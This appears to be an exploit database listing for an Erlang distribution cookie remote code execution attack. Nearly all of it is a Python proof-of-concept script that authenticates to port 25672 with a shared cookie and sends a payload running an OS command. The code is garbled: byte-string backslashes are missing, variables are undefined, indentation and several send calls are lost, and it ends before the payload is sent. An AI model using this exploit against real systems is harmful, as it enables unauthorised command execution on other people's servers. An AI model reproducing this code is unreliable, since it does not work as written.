Home Tools Exploits & CVE's Erlang Cookie Remote Code Execution

Erlang Cookie Remote Code Execution

Authored by 1F98D

Erlang makes use of a cookie that can be leveraged to achieve remote code execution.

# Exploit Title: Erlang Cookie - Remote Code Execution
# Date: 2020-05-04
# Exploit Author: 1F98D
# Original Author: Milton Valencia (wetw0rk)
# Software Link: https://www.erlang.org/
# Version: N/A
# Tested on: Debian 9.11 (x64)
# References:
# https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/
# Erlang allows distributed Erlang instances to connect and remotely execute commands.
# Nodes are permitted to connect to eachother if they share an authentication cookie,
# this cookie is commonly called ".erlang.cookie"

import socket
from hashlib import md5
import struct
import sys

PORT = 25672
CMD = "whoami"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TARGET, PORT))

name_msg = b"x00"
name_msg += b"x15"
name_msg += b"n"
name_msg += b"x00x07"
name_msg += b"x00x03x49x9c"
name_msg += b"AAAAAA@AAAAAAA"

s.recv(5) # Receive "ok" message
challenge = s.recv(1024) # Receive "challenge" message
challenge = struct.unpack(">I", challenge[9:13])[0]

print("Extracted challenge: {}".format(challenge))

challenge_reply = b"x00x15"
challenge_reply += b"r"
challenge_reply += b"x01x02x03x04"
challenge_reply += md5(bytes(COOKIE, "ascii") + bytes(str(challenge), "ascii")).digest()

challenge_res = s.recv(1024)
if len(challenge_res) == 0:
print("Authentication failed, exiting")

print("Authentication successful")

ctrl = b"x83hx04ax06gwx0eAAAAAA@AAAAAAAx00x00x00x03x00x00x00x00x00wx00wx03rex"
msg = b'x83hx02gwx0eAAAAAA@AAAAAAAx00x00x00x03x00x00x00x00x00hx05wx04callwx02oswx03cmdlx00x00x00x01k'
msg += struct.pack(">H", len(CMD))
msg += bytes(CMD, 'ascii')
msg += b'jwx04user'

payload = b'x70' + ctrl + msg
payload = struct.pack('!I', len(payload)) + payload
print("Sending cmd: '{}'".format(CMD))

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